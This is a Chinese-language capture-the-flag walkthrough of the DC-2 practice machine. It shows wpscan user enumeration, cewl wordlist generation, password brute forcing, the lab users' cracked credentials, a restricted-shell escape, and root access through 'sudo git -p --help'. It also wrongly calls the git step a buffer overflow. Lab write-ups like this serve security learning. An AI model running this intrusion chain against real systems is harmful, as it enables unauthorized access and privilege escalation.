标签：bin Username http DC dc PATH 靶机 txt

仅供个人娱乐

靶机信息

下载地址：http://www.five86.com/downloads/DC-2.zip

一、主机扫描

二、信息收集

修改hosts文件

windows：C:\Windows\System32\drivers\etc

linux：/etc/hosts

wpscan --url http://dc-2 --enumerate u

提示cewl 爬密码

cewl http://dc-2 > 1.txt

破解密码

wpscan --url http://dc-2 -U 2.txt -P 1.txt

登录账户信息收集

Username: jerry, Password: adipiscing

Username: tom, Password: parturient

尝试ssh登录  tom   parturient   7744

查看当前环境

echo $PATH

有问题找百度

添加环境变量

BASH_CMDS[a]=/bin/sh;a

export PATH=$PATH:/bin/          #添加$PATH，cat和su都在/bin下

export PATH=$PATH:/usr/bin           #sudo在/usr/bin下

cat flag3.txt

Username: jerry, Password: adipiscing

切换账户进行信息收集

sudo -l 查看权限

有git权限，git有一个缓冲区溢出漏洞，在使用sudo git -p --help时，不需要输入root密码即可以root权限执行这条命令

在末行命令模式输入 !/bin/bash 或 !'sh' 完成提权

!/bin/bash

标签：bin,Username,http,DC,dc,PATH,靶机,txt
来源： https://www.cnblogs.com/bingtang123/p/12838405.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。